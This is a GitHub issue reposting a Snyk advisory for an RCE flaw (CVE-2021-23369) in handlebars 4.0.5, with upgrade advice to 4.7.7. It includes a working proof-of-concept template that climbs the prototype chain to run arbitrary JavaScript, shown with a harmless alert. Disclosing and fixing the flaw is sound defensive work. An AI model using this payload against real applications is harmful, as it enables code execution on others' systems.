You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Snyk Description: ## Overview handlebars is an extension to the Mustache templating language.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.
POC
<script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script>
<script>
// compile the template
var s = `
{{#with (__lookupGetter__ "__proto__")}}
{{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}}
{{#with ../constructor.prototype}}
{{../../constructor.defineProperty . "hasOwnProperty" ..}}
{{/with}}
{{/with}}
{{/with}}
{{#with "constructor"}}
{{#with split}}
{{pop (push "alert('Vulnerable Handlebars JS when compiling in strict mode');")}}
{{#with .}}
{{#with (concat (lookup join (slice 0 1)))}}
{{#each (slice 2 3)}}
{{#with (apply 0 ../..)}}
{{.}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
`;
var template = Handlebars.compile(s, {
strict: true
});
// execute the compiled template and print the output to the console console.log(template({}));
</script>
Package Name: handlebars
Package Version: ['4.0.5']
Package Manager: npm
Target File: package.json
Severity Level: high
Snyk ID: SNYK-JS-HANDLEBARS-1056767
Snyk CVE: CVE-2021-23369
Snyk CWE: CWE-94
Link to issue in Snyk: https://app.snyk.io/org/cse_rhicksiii91/project/14f822de-b806-4bd7-9ad2-767a7feebe1d
Snyk Description: ## Overview
handlebars is an extension to the Mustache templating language.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.
POC
Remediation
Upgrade
handlebarsto version 4.7.7 or higher.References
The text was updated successfully, but these errors were encountered: